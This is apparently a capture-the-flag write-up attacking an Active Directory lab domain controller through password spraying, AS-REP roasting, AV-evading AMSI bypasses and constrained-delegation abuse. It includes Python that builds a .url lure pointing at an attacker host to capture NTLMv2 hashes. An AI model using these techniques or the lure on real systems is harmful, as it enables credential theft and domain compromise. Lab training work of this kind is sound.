πŸ”Reset

This challenge simulates a cyber-attack scenario where you must exploit an Active Directory environment.

Enumeration

IP

10.10.165.85

We are working with a Windows AD domain controller

The first thing we can do is enumerate SMB shares over a null session (anonymous login, no credentials)

We find a Data share with read and write permissions

In the first PDF we find a possible username and a default password

Since the null session works, we can also cycle RIDs (RID brute forcing through SID lookups) to enumerate domain accounts without valid creds

Next we clean up the user list by removing groups, aliases and machine accounts (names ending in $), keeping only real user accounts
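As an added example (not part of the original writeup), here is a small Python script that does that clean-up automatically from saved RID-cycling output. The sample output, the THM domain name, the hostname and every account name except DARLA_WINTERS are constructed; the line format follows the `RID: DOMAIN\name (SidType...)` style printed by netexec's --rid-brute and impacket's lookupsid.py:

```python
import re
import sys

# Constructed sample of RID-cycling output (netexec --rid-brute style: the tool's own
# prefix columns followed by "RID: DOMAIN\name (SidType)"). Domain, host and all
# names except DARLA_WINTERS are made up for this example.
SAMPLE_OUTPUT = """\
SMB  10.10.165.85  445  DC01  500: THM\\Administrator (SidTypeUser)
SMB  10.10.165.85  445  DC01  501: THM\\Guest (SidTypeUser)
SMB  10.10.165.85  445  DC01  502: THM\\krbtgt (SidTypeUser)
SMB  10.10.165.85  445  DC01  512: THM\\Domain Admins (SidTypeGroup)
SMB  10.10.165.85  445  DC01  513: THM\\Domain Users (SidTypeGroup)
SMB  10.10.165.85  445  DC01  1000: THM\\DC01$ (SidTypeUser)
SMB  10.10.165.85  445  DC01  1104: THM\\DARLA_WINTERS (SidTypeUser)
SMB  10.10.165.85  445  DC01  1105: THM\\Helpdesk (SidTypeAlias)
SMB  10.10.165.85  445  DC01  1106: THM\\j.doe (SidTypeUser)
"""

# "RID: [DOMAIN\]name (SidTypeX)" anywhere on the line; the tool prefix is ignored.
LINE_RE = re.compile(
    r"(?P<rid>\d+):\s+(?:(?P<domain>[^\\\s]+)\\)?(?P<name>.+?)\s+\((?P<type>SidType\w+)\)"
)

# User-type accounts that are pointless (or harmful) to spray.
DEFAULT_SKIP = frozenset({"krbtgt", "guest"})


def parse_rid_output(text):
    """Yield (rid, name, sid_type) for every line that carries a RID lookup result."""
    for line in text.splitlines():
        m = LINE_RE.search(line)
        if m:
            yield int(m["rid"]), m["name"], m["type"]


def spray_targets(text, skip=DEFAULT_SKIP):
    """Return unique user names worth spraying, sorted case-insensitively.

    Drops anything that is not SidTypeUser (groups, aliases, domains, unknown),
    machine accounts (sAMAccountName ending in '$') and the names in `skip`.
    Duplicates from concatenated runs are collapsed case-insensitively.
    """
    seen = {}
    for _rid, name, sid_type in parse_rid_output(text):
        if sid_type != "SidTypeUser" or name.endswith("$") or name.lower() in skip:
            continue
        seen.setdefault(name.lower(), name)
    return sorted(seen.values(), key=str.lower)


if __name__ == "__main__":
    # Usage: python3 ridfilter.py rid_brute.txt > users.txt (no argument: run on the sample)
    raw = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_OUTPUT
    print("\n".join(spray_targets(raw)))
```

Administrator is kept on purpose (it is often the account a default password is set on), but check the domain lockout policy before spraying it or anything else with more than one password per observation window.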

Spraying the default password from the PDF against that list gives us a hit (check the domain lockout policy before spraying)

This user does not have any interesting privileges

We can then check for AS-REP roastable accounts

Three accounts have Kerberos pre-authentication disabled, so we can request an AS-REP hash for each of them

Only one of the three hashes cracks, though

This user can RDP into the DC

AD enumeration

AV is enabled on the DC

BloodHound.py failed; it depends on resolving the domain's DNS names (which sometimes means standing up a local DNS forwarder or pointing it at the DC as nameserver), so instead we enumerate the AD from the DC itself

First we need to bypass AMSI (both the PowerShell and the .NET/CLR AMSI scans) so we can reflectively load C# assemblies in memory without touching disk and triggering AV; you will need to find the bypasses yourself, after which we can run SharpHound, and PowerView for manual enumeration

Looking at the Transitive Object Control edges for this user in BloodHound, we see it has GenericAll over some users

GenericAll lets us reset the passwords of those users (noisy, and it locks the real owner out, but fine in a lab), and following the chain we reach DARLA_WINTERS, which has constrained delegation configured

Constrained delegation

With DARLA_WINTERS's credentials we can perform S4U2self/S4U2proxy and request a service ticket for the delegated SPN impersonating Administrator, then use it against the DC; this only works if Administrator is not marked "sensitive, cannot be delegated" or a member of Protected Users

The same could be done from the DC with Rubeus, again loaded reflectively in memory to evade AV

Different initial access path

Since we have write access to the Data share, we could also drop a .lnk or .url file whose icon points to a UNC path on our machine; when a user browses the share, Explorer authenticates to us and we capture an NTLMv2 challenge/response, which we can crack (or relay) to get creds, enumerate the AD and follow the same attack path
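As an added example that is not the writeup's own code, the Python below builds the .url variant (it is plain text, whereas .lnk is a binary format that needs a library) and, for the defensive side, checks an existing .url file for an IconFile that points at an untrusted host. The attacker IP 10.10.14.5, the share and icon names and the @readme.url filename are assumptions:

```python
import ipaddress
import re
import sys
from pathlib import Path

ATTACKER_IP = "10.10.14.5"  # assumption: our SMB listener (e.g. Responder) sits here

# Matches "IconFile=\\host\..." and captures the host part (case-insensitive key, CRLF-tolerant).
ICON_RE = re.compile(r"^IconFile=\\\\([^\\\r\n]+)\\", re.IGNORECASE | re.MULTILINE)


def build_url_shortcut(attacker_ip, share="share", icon="icon.ico",
                       target="https://example.invalid/"):
    """Return the text of a .url file whose icon is loaded from \\\\attacker_ip\\share\\icon.

    Explorer resolves IconFile when it renders the folder listing, so merely
    viewing the share makes the victim's machine authenticate to attacker_ip
    over SMB with the browsing user's credentials (NTLMv2 challenge/response).
    """
    ipaddress.ip_address(attacker_ip)  # raises ValueError on a typo, before anything is uploaded
    unc_icon = f"\\\\{attacker_ip}\\{share}\\{icon}"
    body = ["[InternetShortcut]", f"URL={target}", f"IconFile={unc_icon}", "IconIndex=1"]
    return "\r\n".join(body) + "\r\n"  # INI-style files on Windows use CRLF line endings


def write_shortcut(dest_dir, attacker_ip=ATTACKER_IP, name="@readme.url"):
    """Write the shortcut into a local staging directory; upload it to the share afterwards.

    The leading '@' sorts the file to the top of the listing so it is rendered first.
    """
    path = Path(dest_dir) / name
    path.write_bytes(build_url_shortcut(attacker_ip).encode("ascii"))
    return path


def external_icon_host(url_text, trusted_hosts=()):
    """Defender-side check: the host named in IconFile if it is not trusted, else None.

    Run this over .url files found on writable shares; a UNC icon path that
    points outside the file servers you know about is a hash-capture lure.
    """
    m = ICON_RE.search(url_text)
    if not m:
        return None
    host = m.group(1)
    trusted = {h.lower() for h in trusted_hosts}
    return None if host.lower() in trusted else host


if __name__ == "__main__":
    # Usage: python3 urllure.py [attacker_ip] > @readme.url
    ip = sys.argv[1] if len(sys.argv) > 1 else ATTACKER_IP
    sys.stdout.write(build_url_shortcut(ip))
```

Start the SMB listener before uploading the file, and remember that the capture only happens when someone actually opens the folder, so on a real engagement the wait can be long; the defensive check is cheap to run on a schedule against every writable share.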
